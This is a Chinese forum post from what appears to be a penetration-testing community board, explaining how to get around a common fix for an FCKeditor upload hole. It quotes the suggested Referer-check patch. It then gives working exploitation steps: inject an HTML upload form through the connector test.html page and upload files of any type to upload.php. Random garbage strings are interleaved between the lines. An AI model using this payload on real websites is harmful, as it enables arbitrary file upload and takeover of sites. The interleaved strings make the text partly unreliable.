中国网络渗透测试联盟
标题:
fckeditor 漏洞修复后的二次利用
[打印本页]
作者:
admin
时间:
2013-1-11 21:12
标题:
fckeditor 漏洞修复后的二次利用
漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
8 U) @2 o8 V8 X/ L
网上给出的修复方案是
" Y% C0 s# H0 K# v, T/ Q
修复方法,删除FCK编辑器用其他的编辑器
& ?$ f* _- E# ~5 ?; J5 e
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
7 ^ z# F8 F; a4 I2 k6 r
在
% x* ?' F ^8 n. A8 G6 M% O
require(‘config.php’);
0 Z# c* A/ d; V# Q
require(‘util.php’);
; ]" G* G& y% o/ S; u2 E3 \" ^0 {
的下面添加以下代码—————————–
- e2 c M) y) M
//防止外部提交
) n3 Q. L) [. I
function outsidepost()
' D2 P1 i! X2 t; f& `& R( n
{
$ a3 n2 d, a- s0 c" W! b# |* X6 e
$servername=$_SERVER['SERVER_NAME'];
, s. J! `' D% ~0 u; K
$sub_from=@$_SERVER['HTTP_REFERER'];
) d7 h9 K% ^, i0 j$ |$ F& S! k
$sub_len=strlen($servername);
& [/ X6 O L `4 W( E# p, m# }
$checkfrom=substr($sub_from,7,$sub_len);
5 v/ H! x T q& @& M
if($checkfrom!=$servername){
# p2 P' R% n* ?! r% u8 \" @' {8 L
echo(“you don’t outsidepost!”);
+ N2 f) V3 h. Z6 h" e3 t' @* n
exit;
$ A/ L! z# Z. i3 r
}
0 t# Z4 W# t3 E: N' ^, {
}
$ E2 ]' q1 F+ {$ h7 m4 H9 b
outsidepost();
" k* |" x2 }. n6 ~% V- S9 I3 B
防止外部提交,但是没有防止内部提交,
/ k1 v$ r6 q6 ?) n% j- j2 Q
利用方法:
2 }4 x7 m$ L% {2 N: t/ n: T# ~# m
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
! ]9 i8 a) h& R7 C8 O
2,在Current Folder 框输入
1 e8 G9 o* Z6 O7 v" s9 \! `
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
$ I& F ~; H0 h( k* ?9 y" |
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
% r8 y/ Z; ^4 _; z& x& w6 K
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2